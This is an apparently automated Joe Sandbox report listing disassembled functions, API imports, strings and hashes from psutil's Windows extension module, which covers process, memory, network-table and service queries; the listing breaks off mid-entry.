malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD68CF0
PyErr_NoMemory.PYTHON3 ref: 00007FFB9DD68CFE
GetExtendedTcpTable.IPHLPAPI ref: 00007FFB9DD68D34
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD68D56
PyErr_SetString.PYTHON3 ref: 00007FFB9DD68D7A

Strings

psutil-debug [%s:%d]> , xrefs: 00007FFB9DD68DB6
GetExtendedTcpTable failed, xrefs: 00007FFB9DD68D70
psutil/arch/windows\socks.c, xrefs: 00007FFB9DD68DAC
GetExtendedTcpTable: retry with different bufsize, xrefs: 00007FFB9DD68DD0

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Err_ExtendedTable$MemoryStringfreemalloc
String ID: GetExtendedTcpTable failed$GetExtendedTcpTable: retry with different bufsize$psutil-debug [%s:%d]> $psutil/arch/windows\socks.c
API String ID: 70375929-1350966821
Opcode ID: bd1c7ac8eac39c2bf01263f676da7dc647cc66e129fb5fee7e0bf14467d57ffb
Instruction ID: df9e96d580a798445a0bce5fba6424fd7701f647d66f4e4dd14fd9e05c1408cb
Opcode Fuzzy Hash: bd1c7ac8eac39c2bf01263f676da7dc647cc66e129fb5fee7e0bf14467d57ffb
Instruction Fuzzy Hash: AD4197B5B08A0182E7249B3AF44427963A1FF8C7D4F856036DA8D437A4FF7CD5458B80

Function 00007FFB9DD67090 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 135COMMON

Download Yara Rule

APIs

PyArg_ParseTupleAndKeywords.PYTHON3 ref: 00007FFB9DD670D3
Py_BuildValue.PYTHON3 ref: 00007FFB9DD67280

Part of subcall function 00007FFB9DD67D20: OpenProcess.KERNEL32(?,?,?,00007FFB9DD6471A), ref: 00007FFB9DD67D36
Part of subcall function 00007FFB9DD67D20: CloseHandle.KERNEL32(?,?,?,00007FFB9DD6471A), ref: 00007FFB9DD67D53

CommandLineToArgvW.SHELL32 ref: 00007FFB9DD6717C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD67247
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD6725B
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD6726F

Part of subcall function 00007FFB9DD610E0: PyObject_CallFunction.PYTHON3 ref: 00007FFB9DD6112B
Part of subcall function 00007FFB9DD610E0: PyErr_SetObject.PYTHON3 ref: 00007FFB9DD61141
Part of subcall function 00007FFB9DD610E0: _Py_Dealloc.PYTHON3 ref: 00007FFB9DD61155

Strings

psutil_pid_is_running -> 0, xrefs: 00007FFB9DD670FD
CommandLineToArgvW, xrefs: 00007FFB9DD6718A
i|O, xrefs: 00007FFB9DD670B9

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Dealloc$Arg_ArgvBuildCallCloseCommandErr_FunctionHandleKeywordsLineObjectObject_OpenParseProcessTupleValuefree
String ID: CommandLineToArgvW$i|O$psutil_pid_is_running -> 0
API String ID: 1577039377-3353757699
Opcode ID: 7ef707286af80731c70be7b8a08bec645b5be586077949817ea5f611d28cf24c
Instruction ID: a784896d174f0a27ce9d2f638d0d3ff379734d7addbec977c99a4b07ef3c97e9
Opcode Fuzzy Hash: 7ef707286af80731c70be7b8a08bec645b5be586077949817ea5f611d28cf24c
Instruction Fuzzy Hash: 0751A7A5B19E4692EA708F37E8405B963A0BF4CB90FC52131DADD467A4FF3CD4458780

Function 00007FFB9DD66980 Relevance: 26.3, APIs: 9, Strings: 6, Instructions: 66COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFB9DD61010: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFB9DD6105B

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFB9DD669DC
fprintf.MSPDB140-MSVCRT ref: 00007FFB9DD669F9

Part of subcall function 00007FFB9DD61D70: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00000000,00000000,00007FFB9DD67DB4), ref: 00007FFB9DD61DA7

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFB9DD66A03
fprintf.MSPDB140-MSVCRT ref: 00007FFB9DD66A14
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFB9DD66A1E
fprintf.MSPDB140-MSVCRT ref: 00007FFB9DD66A2E
PyObject_CallFunction.PYTHON3 ref: 00007FFB9DD66A68
PyErr_SetObject.PYTHON3 ref: 00007FFB9DD66A7E
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD66A92

Strings

psutil-debug [%s:%d]> , xrefs: 00007FFB9DD669F2
psutil/arch/windows\proc_info.c, xrefs: 00007FFB9DD669E8
assume access denied (originated from %s), xrefs: 00007FFB9DD66A3B
%s -> ERROR_NOACCESS, xrefs: 00007FFB9DD669BA
ReadProcessMemory, xrefs: 00007FFB9DD669AB, 00007FFB9DD66AB8
(is), xrefs: 00007FFB9DD66A5E

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: __acrt_iob_funcfprintf$CallDeallocErr_FunctionObjectObject___stdio_common_vfprintf__stdio_common_vsprintf
String ID: %s -> ERROR_NOACCESS$(is)$ReadProcessMemory$assume access denied (originated from %s)$psutil-debug [%s:%d]> $psutil/arch/windows\proc_info.c
API String ID: 3932792662-3282842418
Opcode ID: 8ddbd74063197d27fd476e7291b552cbacf2d495c7f7d6042afda100fb00c8e8
Instruction ID: 0a18ec1642cbf49b940846f0913aa981666e848d9ef934d4d9965fc29213af1d
Opcode Fuzzy Hash: 8ddbd74063197d27fd476e7291b552cbacf2d495c7f7d6042afda100fb00c8e8
Instruction Fuzzy Hash: 4C31ECA5B08A8281EA30DB76E4553B96360FF9CB84FC06136D9CD466A5FE2DE5058780

Function 00007FFB9DD644F0 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 114timeCOMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON3 ref: 00007FFB9DD64509
OpenProcess.KERNEL32 ref: 00007FFB9DD64533
GetLastError.KERNEL32 ref: 00007FFB9DD64541
GetProcessTimes.KERNEL32 ref: 00007FFB9DD64593
GetLastError.KERNEL32 ref: 00007FFB9DD6459D
CloseHandle.KERNEL32 ref: 00007FFB9DD645B7

Part of subcall function 00007FFB9DD61180: PyObject_CallFunction.PYTHON3 ref: 00007FFB9DD611CB
Part of subcall function 00007FFB9DD61180: PyErr_SetObject.PYTHON3 ref: 00007FFB9DD611E1
Part of subcall function 00007FFB9DD61180: _Py_Dealloc.PYTHON3 ref: 00007FFB9DD611F5

PyErr_SetFromWindowsErr.PYTHON3 ref: 00007FFB9DD645CC
CloseHandle.KERNEL32 ref: 00007FFB9DD645D5

Strings

automatically set for PID 0, xrefs: 00007FFB9DD6451B
(ddd), xrefs: 00007FFB9DD64632
OpenProcess, xrefs: 00007FFB9DD6454C
GetProcessTimes -> ERROR_ACCESS_DENIED, xrefs: 00007FFB9DD645A8

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: CloseErr_ErrorHandleLastProcess$Arg_CallDeallocFromFunctionObjectObject_OpenParseTimesTupleWindows
String ID: (ddd)$GetProcessTimes -> ERROR_ACCESS_DENIED$OpenProcess$automatically set for PID 0
API String ID: 935190873-3215740380
Opcode ID: f304403649b8fc43a3727289106310d60c7b78308e18786ddd0de0213bd49375
Instruction ID: 0dc3e8d6b89c4e0f651a1d9c3924bf92c8b6ceffcfbed7caa0d2c2f9933d908b
Opcode Fuzzy Hash: f304403649b8fc43a3727289106310d60c7b78308e18786ddd0de0213bd49375
Instruction Fuzzy Hash: EB41C6B1B1DE4686EA61CB37F440179A392AF8C780FC56231E59F53665FF2CE4418740

Function 00007FFB9DD68964 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 102serviceCOMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON3 ref: 00007FFB9DD68993
QueryServiceConfig2W.ADVAPI32 ref: 00007FFB9DD689F1
GetLastError.KERNEL32 ref: 00007FFB9DD689F7
CloseServiceHandle.ADVAPI32 ref: 00007FFB9DD68A07
Py_BuildValue.PYTHON3 ref: 00007FFB9DD68A1B

Strings

QueryServiceConfig2W, xrefs: 00007FFB9DD68AE1

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Service$Arg_BuildCloseConfig2ErrorHandleLastParseQueryTupleValue
String ID: QueryServiceConfig2W
API String ID: 40459686-608009358
Opcode ID: 5b6db606565531edd5297e18b1a8ee90cf512e2b561443191a6fa1691593a2f6
Instruction ID: 6b4967aaeca6a4acfa4a6ab102b1af537b05330bf8ba4848f1755c8881fab55a
Opcode Fuzzy Hash: 5b6db606565531edd5297e18b1a8ee90cf512e2b561443191a6fa1691593a2f6
Instruction Fuzzy Hash: 82412DA1B1CA8682EB209F26E85416A6760FF8DB94FD46131DADD43BA4FF2CE505C740

Function 00007FFB9DD69F20 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 73COMMON

Download Yara Rule

APIs

PdhOpenQueryW.PDH ref: 00007FFB9DD69F2D
PyErr_Format.PYTHON3 ref: 00007FFB9DD69F48
PdhAddEnglishCounterW.PDH ref: 00007FFB9DD69F69
CreateEventW.KERNEL32 ref: 00007FFB9DD69F8F
PdhCollectQueryDataEx.PDH ref: 00007FFB9DD69FC2
PyErr_Format.PYTHON3 ref: 00007FFB9DD69FDD

Part of subcall function 00007FFB9DD61070: GetLastError.KERNEL32 ref: 00007FFB9DD61092
Part of subcall function 00007FFB9DD61070: PyErr_SetFromWindowsErrWithFilename.PYTHON3 ref: 00007FFB9DD610B5

Strings

PdhCollectQueryDataEx failed, xrefs: 00007FFB9DD69FD3
PdhAddEnglishCounterW failed. Performance counters may be disabled., xrefs: 00007FFB9DD69F73
PdhOpenQueryW failed, xrefs: 00007FFB9DD69F37
\System\Processor Queue Length, xrefs: 00007FFB9DD69F62
RegisterWaitForSingleObject, xrefs: 00007FFB9DD6A01D
LoadUpdateEvent, xrefs: 00007FFB9DD69F7C
CreateEventW, xrefs: 00007FFB9DD69F9D

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Err_$FormatQuery$CollectCounterCreateDataEnglishErrorEventFilenameFromLastOpenWindowsWith
String ID: CreateEventW$LoadUpdateEvent$PdhAddEnglishCounterW failed. Performance counters may be disabled.$PdhCollectQueryDataEx failed$PdhOpenQueryW failed$RegisterWaitForSingleObject$\System\Processor Queue Length
API String ID: 646616500-2122461562
Opcode ID: 4e05a644f45813d87ba8d81d6d7448e41985b546c29842d21a7af58cec599303
Instruction ID: 9249668853ab70aa3124160eac7ad2402e83b9f26c42257eae13010edd0986b9
Opcode Fuzzy Hash: 4e05a644f45813d87ba8d81d6d7448e41985b546c29842d21a7af58cec599303
Instruction Fuzzy Hash: 7B31EFA5B08A4682EB20DF73E8401A963A1FF8C794FC56035DA8D86764FF3DE549C780

Function 00007FFB9DD64940 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON3 ref: 00007FFB9DD6496E
OpenProcess.KERNEL32 ref: 00007FFB9DD64998
GetLastError.KERNEL32 ref: 00007FFB9DD649A6
GetProcessMemoryInfo.PSAPI ref: 00007FFB9DD64A00
PyErr_SetFromWindowsErr.PYTHON3 ref: 00007FFB9DD64A0C
CloseHandle.KERNEL32 ref: 00007FFB9DD64A15
CloseHandle.KERNEL32 ref: 00007FFB9DD64A20
Py_BuildValue.PYTHON3 ref: 00007FFB9DD64A99

Part of subcall function 00007FFB9DD61180: PyObject_CallFunction.PYTHON3 ref: 00007FFB9DD611CB
Part of subcall function 00007FFB9DD61180: PyErr_SetObject.PYTHON3 ref: 00007FFB9DD611E1
Part of subcall function 00007FFB9DD61180: _Py_Dealloc.PYTHON3 ref: 00007FFB9DD611F5

Strings

automatically set for PID 0, xrefs: 00007FFB9DD64980
OpenProcess, xrefs: 00007FFB9DD649B1
(kKKKKKKKKK), xrefs: 00007FFB9DD64A2E

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: CloseErr_HandleProcess$Arg_BuildCallDeallocErrorFromFunctionInfoLastMemoryObjectObject_OpenParseTupleValueWindows
String ID: (kKKKKKKKKK)$OpenProcess$automatically set for PID 0
API String ID: 3753264371-2652395995
Opcode ID: a359856cd35421bb7a13a7dfaaf1f6e524f1c22cc6bac77cb5ad82af595cb7a4
Instruction ID: 260bd69064bcbc02ebffd1f7b28480fe498791ea713fbed480f3d99093d23db2
Opcode Fuzzy Hash: a359856cd35421bb7a13a7dfaaf1f6e524f1c22cc6bac77cb5ad82af595cb7a4
Instruction Fuzzy Hash: EE31EE6570DB8681EA709B26F45036A63A0FF8D784F806136DACD43768FF3CD4448780

Function 00007FFB9DD65940 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON3 ref: 00007FFB9DD6596B
OpenProcess.KERNEL32 ref: 00007FFB9DD65995
GetLastError.KERNEL32 ref: 00007FFB9DD659A3
GetProcessIoCounters.KERNEL32 ref: 00007FFB9DD659F4
PyErr_SetFromWindowsErr.PYTHON3 ref: 00007FFB9DD65A00
CloseHandle.KERNEL32 ref: 00007FFB9DD65A09
CloseHandle.KERNEL32 ref: 00007FFB9DD65A14
Py_BuildValue.PYTHON3 ref: 00007FFB9DD65A4E

Part of subcall function 00007FFB9DD61180: PyObject_CallFunction.PYTHON3 ref: 00007FFB9DD611CB
Part of subcall function 00007FFB9DD61180: PyErr_SetObject.PYTHON3 ref: 00007FFB9DD611E1
Part of subcall function 00007FFB9DD61180: _Py_Dealloc.PYTHON3 ref: 00007FFB9DD611F5

Strings

automatically set for PID 0, xrefs: 00007FFB9DD6597D
OpenProcess, xrefs: 00007FFB9DD659AE
(KKKKKK), xrefs: 00007FFB9DD65A1F

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: CloseErr_HandleProcess$Arg_BuildCallCountersDeallocErrorFromFunctionLastObjectObject_OpenParseTupleValueWindows
String ID: (KKKKKK)$OpenProcess$automatically set for PID 0
API String ID: 1543235388-302434769
Opcode ID: df207976c48d818ced7e2ea94363f71d4ee6f6295f0a505bf589c7a8c8605456
Instruction ID: 9bfe558e5d8af2f2653c9e7f4a95d75554b65aa35bae2628a70b98e2ea7f5ea7
Opcode Fuzzy Hash: df207976c48d818ced7e2ea94363f71d4ee6f6295f0a505bf589c7a8c8605456
Instruction Fuzzy Hash: D0310EA1B0DA4681EA709B37E45437A63A1FF9D790F946036DACD42769FE2CE4448780

Function 00007FFB9DD680F0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 58serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32 ref: 00007FFB9DD6811A
PyErr_SetFromWindowsErrWithFilename.PYTHON3 ref: 00007FFB9DD6814F
GetLastError.KERNEL32 ref: 00007FFB9DD68128

Part of subcall function 00007FFB9DD61010: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFB9DD6105B

OpenServiceA.ADVAPI32 ref: 00007FFB9DD68162
GetLastError.KERNEL32 ref: 00007FFB9DD68170
PyErr_SetFromWindowsErrWithFilename.PYTHON3 ref: 00007FFB9DD68197
CloseServiceHandle.ADVAPI32 ref: 00007FFB9DD681A0

Strings

OpenSCManager, xrefs: 00007FFB9DD6812E
(originated from %s), xrefs: 00007FFB9DD68137, 00007FFB9DD6817F
OpenService, xrefs: 00007FFB9DD68176

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Err_ErrorFilenameFromLastOpenServiceWindowsWith$CloseHandleManager__stdio_common_vsprintf
String ID: (originated from %s)$OpenSCManager$OpenService
API String ID: 4285539973-532727491
Opcode ID: 3815096754f83270638b2f75041748c4c5a74b75e2489ef7d1a75f0052e1f187
Instruction ID: 294dccdbb437e9f246763fd91d8a1a5b27391f22a0e003ba82f89bdfaa721432
Opcode Fuzzy Hash: 3815096754f83270638b2f75041748c4c5a74b75e2489ef7d1a75f0052e1f187
Instruction Fuzzy Hash: F52154D1B1CA4682EF309B36E85437923A1BF4C789FC16431CA8E46765FE3CE5098780

Function 00007FFB9DD67D80 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFB9DD67D92
fprintf.MSPDB140-MSVCRT ref: 00007FFB9DD67DAF

Part of subcall function 00007FFB9DD61D70: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00000000,00000000,00007FFB9DD67DB4), ref: 00007FFB9DD61DA7

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFB9DD67DB9
fprintf.MSPDB140-MSVCRT ref: 00007FFB9DD67DC9
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFB9DD67DD3
fprintf.MSPDB140-MSVCRT ref: 00007FFB9DD67DE3
GetLastError.KERNEL32 ref: 00007FFB9DD67DE8
PyErr_WarnEx.PYTHON3 ref: 00007FFB9DD67E0A

Strings

psutil-debug [%s:%d]> , xrefs: 00007FFB9DD67DA8
psutil/arch/windows\security.c, xrefs: 00007FFB9DD67D9E
psutil module couldn't set SE DEBUG mode for this process; please file an issue against psutil bug tracker, xrefs: 00007FFB9DD67DC2, 00007FFB9DD67DFA

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: __acrt_iob_funcfprintf$Err_ErrorLastWarn__stdio_common_vfprintf
String ID: psutil module couldn't set SE DEBUG mode for this process; please file an issue against psutil bug tracker$psutil-debug [%s:%d]> $psutil/arch/windows\security.c
API String ID: 306901517-4141899461
Opcode ID: f2194c8e053424292d9a5393c0b623c5170a1408838a0c2b7a2a2b9c52ca4fbd
Instruction ID: e5bd3800d0ce9a8b80cb91b7a11b3c96a6e924df3c677386967d8043929d4b06
Opcode Fuzzy Hash: f2194c8e053424292d9a5393c0b623c5170a1408838a0c2b7a2a2b9c52ca4fbd
Instruction Fuzzy Hash: 0C01DEA4F09A0281E6349B77D8552B42262AF4DB84FC12136C48D062B1FE6EA585C7C1

Function 00007FFB9DD65A60 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 62COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON3 ref: 00007FFB9DD65A79
OpenProcess.KERNEL32 ref: 00007FFB9DD65AA3
GetLastError.KERNEL32 ref: 00007FFB9DD65AB1
GetProcessAffinityMask.KERNEL32 ref: 00007FFB9DD65AF4
PyErr_SetFromWindowsErr.PYTHON3 ref: 00007FFB9DD65B00
CloseHandle.KERNEL32 ref: 00007FFB9DD65B09

Part of subcall function 00007FFB9DD61180: PyObject_CallFunction.PYTHON3 ref: 00007FFB9DD611CB
Part of subcall function 00007FFB9DD61180: PyErr_SetObject.PYTHON3 ref: 00007FFB9DD611E1
Part of subcall function 00007FFB9DD61180: _Py_Dealloc.PYTHON3 ref: 00007FFB9DD611F5

CloseHandle.KERNEL32 ref: 00007FFB9DD65B1F
Py_BuildValue.PYTHON3 ref: 00007FFB9DD65B31

Strings

automatically set for PID 0, xrefs: 00007FFB9DD65A8B
OpenProcess, xrefs: 00007FFB9DD65ABC

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: CloseErr_HandleProcess$AffinityArg_BuildCallDeallocErrorFromFunctionLastMaskObjectObject_OpenParseTupleValueWindows
String ID: OpenProcess$automatically set for PID 0
API String ID: 1951706264-2746090705
Opcode ID: 823163d15e988816da25f41325fa0c3a318b2443c2e7eeeeda2df9b2712e6337
Instruction ID: 981ed42c00c02e59afafe9791965d94ab757deadcff986b974e3855d181b275a
Opcode Fuzzy Hash: 823163d15e988816da25f41325fa0c3a318b2443c2e7eeeeda2df9b2712e6337
Instruction Fuzzy Hash: 302168A0B0CA4781EB709B37F84417963A0FF5C784FC56435DA9D426A5FE2CE4458780

Function 00007FFB9DD65CF0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 61COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON3 ref: 00007FFB9DD65D09
OpenProcess.KERNEL32 ref: 00007FFB9DD65D33
GetLastError.KERNEL32 ref: 00007FFB9DD65D41
GetProcessHandleCount.KERNEL32 ref: 00007FFB9DD65D7F
PyErr_SetFromWindowsErr.PYTHON3 ref: 00007FFB9DD65D8B
CloseHandle.KERNEL32 ref: 00007FFB9DD65D94

Part of subcall function 00007FFB9DD61180: PyObject_CallFunction.PYTHON3 ref: 00007FFB9DD611CB
Part of subcall function 00007FFB9DD61180: PyErr_SetObject.PYTHON3 ref: 00007FFB9DD611E1
Part of subcall function 00007FFB9DD61180: _Py_Dealloc.PYTHON3 ref: 00007FFB9DD611F5

CloseHandle.KERNEL32 ref: 00007FFB9DD65DAA
Py_BuildValue.PYTHON3 ref: 00007FFB9DD65DBB

Strings

automatically set for PID 0, xrefs: 00007FFB9DD65D1B
OpenProcess, xrefs: 00007FFB9DD65D4C

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Handle$CloseErr_Process$Arg_BuildCallCountDeallocErrorFromFunctionLastObjectObject_OpenParseTupleValueWindows
String ID: OpenProcess$automatically set for PID 0
API String ID: 2606922913-2746090705
Opcode ID: 7f4d436ac089e1850c398ef9c721bad44193c8434375873144d6a517292c8fd0
Instruction ID: fdd5aeb3f8771d58274cf48382d7b33afc0ffbd1677d460ea6e23e02322da3ef
Opcode Fuzzy Hash: 7f4d436ac089e1850c398ef9c721bad44193c8434375873144d6a517292c8fd0
Instruction Fuzzy Hash: B52195A0B1CA4382EB749B37F84817963A0FF5C780FC57035D68E426A9FE2CE4858780

Function 00007FFB9DD655A0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 61COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON3 ref: 00007FFB9DD655B9
OpenProcess.KERNEL32 ref: 00007FFB9DD655E3
